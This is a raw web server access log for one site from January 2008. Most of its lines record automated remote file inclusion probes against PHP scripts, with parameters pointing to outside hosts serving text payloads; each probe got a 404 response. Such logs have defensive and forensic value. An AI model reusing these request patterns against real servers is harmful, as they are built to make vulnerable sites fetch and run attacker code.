66.98.148.56 - - [03/Jan/2008:02:23:14 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:23:15 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.51.87.246 - - [03/Jan/2008:02:23:46 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [03/Jan/2008:02:23:47 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [03/Jan/2008:02:23:47 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:02:23:51 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:02:23:51 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:02:23:51 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:25:12 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.116.91.37 - - [03/Jan/2008:02:25:20 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.209.205 - - [03/Jan/2008:02:26:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [03/Jan/2008:02:26:05 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:27:06 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:27:07 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:27:07 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.205 - - [03/Jan/2008:02:27:11 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:27:30 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:27:50 -0800] "GET /logs/access_071218.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.123.207.130 - - [03/Jan/2008:02:28:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:29:14 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:29:15 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:29:15 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.207.130 - - [03/Jan/2008:02:30:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:30:26 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:30:26 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:43 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:50 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:51 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:30:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.43 - - [03/Jan/2008:02:32:19 -0800] "GET /bikes/dteel/10MAR07/?D=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:32:21 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:32:21 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:32:21 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:34:29 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:34:29 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:34:32 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.123.207.130 - - [03/Jan/2008:02:34:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.209.218 - - [03/Jan/2008:02:35:35 -0800] "GET /logs//index.php?skin_file=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.86.209.218 - - [03/Jan/2008:02:35:35 -0800] "GET //index.php?skin_file=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:37:05 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:37:05 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:37:05 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:38:42 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:38:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:38:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:39:16 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:39:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:39:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:41:36 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:41:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:41:36 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:41:41 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.116.91.37 - - [03/Jan/2008:02:42:19 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.37 - - [03/Jan/2008:02:42:19 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.37 - - [03/Jan/2008:02:42:20 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:42:50 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:42:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:42:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:43:47 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:43:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:43:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:44:08 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:44:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:44:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:44:11 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:44:55 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:46:17 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:47:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.208.66 - - [03/Jan/2008:02:47:38 -0800] "GET /logs/admin/tools/send_reminders.php?noSet=0&includedirhttp://www.fantasyherald.com/creations/pics/help.jpg/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.85.208.66 - - [03/Jan/2008:02:47:38 -0800] "GET /admin/tools/send_reminders.php?noSet=0&includedirhttp://www.fantasyherald.com/creations/pics/help.jpg/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.29.87.145 - - [03/Jan/2008:02:48:22 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.87.145 - - [03/Jan/2008:02:48:22 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.27.203.44 - - [03/Jan/2008:02:48:48 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:51:22 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:51:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:51:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:52:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:15 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:15 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:52:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:23 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:50 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:53:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:54:37 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:54:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:54:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:10 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:14 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:56:19 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:56:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:56:19 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
